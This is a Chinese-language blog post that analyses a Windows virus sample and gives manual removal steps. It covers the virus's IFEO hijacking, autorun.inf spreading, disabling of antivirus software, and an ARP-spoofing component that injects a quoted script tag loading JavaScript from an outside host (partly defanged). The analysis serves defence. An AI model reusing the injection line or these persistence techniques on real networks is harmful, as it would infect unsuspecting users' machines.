查看文章 |
昨晚``5月28日收到的样本``一个MM电脑上抓过来的```早上跟踪了下`` 呼```又更新了``头疼```````` 以前写的分析: http://hi.baidu.com/%B9%C2%B6%C0%B8%FC%BF%C9%BF%BF/blog/item/230a82af1f6619cd7cd92a9d.html ====================================================== Aditional Information File size: 36435 bytes ====================================================== 病毒行为(简单写了```): 1、病毒是一个8位随机数组成的(0—F),其实是本身机子的机器码。运行后释放同名的Dll文件,设置系统全局挂勾。后枚举进程,插入TIMPlatform.exe和Explorer.exe进程(如果有) Dll的文件在C:\Program Files\Common Files\MicrosoftShared\MSInfo\下,目录下还有个同名的dat文件``` 最后还释放了一个hlp(系统帮助文件),在%Windir%\help\下,44字节的,属性为存档``` (dll文件48723 字节,dat的36435 字节,属性为系统-隐藏-只读)```` 2、插入进程的随机8位数.dll检测窗口句柄,并关闭列入病毒名单的“关键字”一些冷门的工具也不放过````` 3、修改IFEO重定向劫持,指向的是:C:\Program Files\Common Files\MicrosoftShared\MSInfo\的Dat文件。 4、破坏安全模式和显示隐藏文件,达到自身防护的目的。 5、释放一个Dl1.exe,创建远程线程并调用IE下载木马,下了一大推,乱乱的```` 6、(遍历)每个分区,在跟目录下生成Autorun.inf和随机8位的EXE,达到双击硬盘激活病毒。 Autorun.inf内容为: [AutoRun] 7、依附宿主的随机8位Dll每隔一段时间刷新,检测自身释放的“同党”和修改的注册表项,如果被修改和删除的话即使其恢复。并监视移动介质盘插入,支持U盘传播````````` 8、修改安全工具(杀软)服务和驱动的启动类型,设置为禁用,并删除其RUN启项,最后还挂了系统自带的防火墙`` 9、用安全工具(如果能打开)检测宿主模块时,那么它则卸掉自身,安全工具退出(关闭)时,重新注入。 10、"病毒版本":在C:\Program Files和C:\WINNT\system32\DirectX,释放一个.ini的文本,里面生成病毒的版本``我生成的是525,也就是5.25日更新的版本。 11、局域ARP挂马````比较“旁门”的技术(开始有点佩服作者)由外部下载的病毒ycnt9.exe,释放的win1ogo.exe,由它监听局域,每5秒刷新从自身机子(被感染的)经过的ARP数据包,并插入一短Js代码````` 代码内容为: "<script language=javascript src=h**p://google.171738.org/ad2.js></script>" 呵呵,我把Http改为H**p。嗅探范围:192.168.0.1-192.168.0.254,这意味着经过该被感染机子的数据包返回时,是一段被挂马的数据包!!!说简单点就是你浏览的所有网页上都有病毒。后来我点入该网址,是个MD5一样的8位随机病毒,呵呵,病毒名字为“hello.exe”。 这可比访问局域穷举猜口令轻松多了,这也是我佩服作者的地方。````(有点贬义) 12、常驻进程的随机8位数.dll每毫秒刷新,尝试拦截FindWindowExA、mouse_event等信息函数,修改映像命令,发送“假情报”`````向瑞星注册表监控捕捉发送“允许”命令`(不经过用户操作)``````
解决方案: 先到http://free.ys168.com/?gudugengkekao下载工具 SREng、冰刃、PowerRMV 、autoruns、unlocker1.8.5.exe、“显示隐藏文件”(注册表)和“修复安全模式”(注册表)
直接放桌面,后断开网络(这点很重要)然后按步骤```
重要提示:先把所有工具都重命名,不然由于IFEO的影响,无法运行的。例如 7.exe a8u7.exe apoe.exe(不要有规律````)
1、打开冰刃(改名了吧?!),结束一个8位数字的EXE文件(如有看到,没有则忽略)然后用冰刃的“文件”功能```展开到C:\Program Files\Common Files\Microsoft Shared\MSINFO\下````删除2个8位随机数字的文件。扩展名分别为:dat 和dll````再到%windir%\help\删除同名的.hlp(系统帮助文件图标````大小为44字节)
注意:我测试的时候并不能删除掉(其实是删除后再生成),如果上面用冰刃无法删除的话,那么则用unlocker删除,用法很简单哦(需要安装)。在此之前先把下载下来的"显示隐藏文件"注册表导入,然后显示所有隐藏文件,到它的目录下用Unlocker解锁删除!
2、这时候所有安全工具等都可以打开了,首先打开PowerRMV,填入:(一次一个,找不到的忽略)
C:\autorun.inf D:\autorun.inf E:\autorun.inf F:\autorun.inf
3、还有autorun.inf指向的病毒,扩展名为exe的。也一并删除!!
4、打开autoruns(改名了吧?!)删除IFEO劫持项``挨个删```
5、下载的SREng,删除下面的:(不一定全)
注册表
<testrun><C:\DOCUME~1\admin\LOCALS~1\Temp\testexe.exe> []
<Kvsc><C:\winnt\Kvsc3.exe> [] <msccrt><C:\winnt\msccrt.exe> [] [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run] <MSDEG32><LYLoader.exe> [] <MSDWG32><LYLoadbr.exe> [N/A] <MSDCG32 ><LYLeador.exe> [N/A] <MSDOG32><LYLoador.exe> [N/A] <MSDSG32><LYLoadar.exe> [N/A] <MSDMG32><LYLoadmr.exe> [N/A] <MSDHG32><LYLoadhr.exe> [N/A] <MSDQG32><LYLoadqr.exe> [N/A] 服务
[Win32 Display Driver / Win32DDS][Stopped/Auto Start]
<C:\winnt\system32\rundll32.exe windds32.dll,input><Microsoft Corporation> [Win32 Debug Service / MSDebugsvc][Stopped/Auto Start] <C:\winnt\system32\rundll32.exe msdebug.dll,input><Microsoft Corporation> 驱动程序 [Netgroup Packet Filter / NPF][Running/Manual Start]
<system32\drivers\npf.sys><CACE Technologies> 还有些其他Dll的病毒文件,不记得那么许多了```(后面再用杀软解决)
6、打开注册表,查找随机释放的DLL文件(8位数),找到后删除,我测试时生成的是:
HKEY_CLASSES_ROOT\CLSID\{0A7204B0-04B0-A72E-B0A7-4B0724B0A72E}\InProcServer32\
C:\Program Files\Common Files\Microsoft Shared\MSINFO\04B0A72E.dll
7、下载的注册表导入``修复安全模式和显示隐藏文件项。
上面做完后重装下杀软(技术硬的话,自己重写回注册表,和设置其启动类型),升级最高版本,全盘扫。
======================================================
后话: 古人为什么推崇“德才兼备”?那只是因为有才没德的人,危害更大!!!!!!! 孤独更可靠真诚希望病毒的作者能因此停止更新,学技术是为了帮助更多的人……而不是“搞破坏”```` 珍惜身边那些关心你的人`````
另附上一些连接: http://www.antivirus-china.org.cn/law/f3.htm http://www.antivirus-china.org.cn/law/f2.htm http://www.antivirus-china.org.cn/law/fagui.htm http://tech.163.com/07/0312/18/39DEG9K1000915BF.html http://www.infosec.org.cn/news/news_detail.php?mID=8845 一些图:
 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: 此主题相关图片如下: |
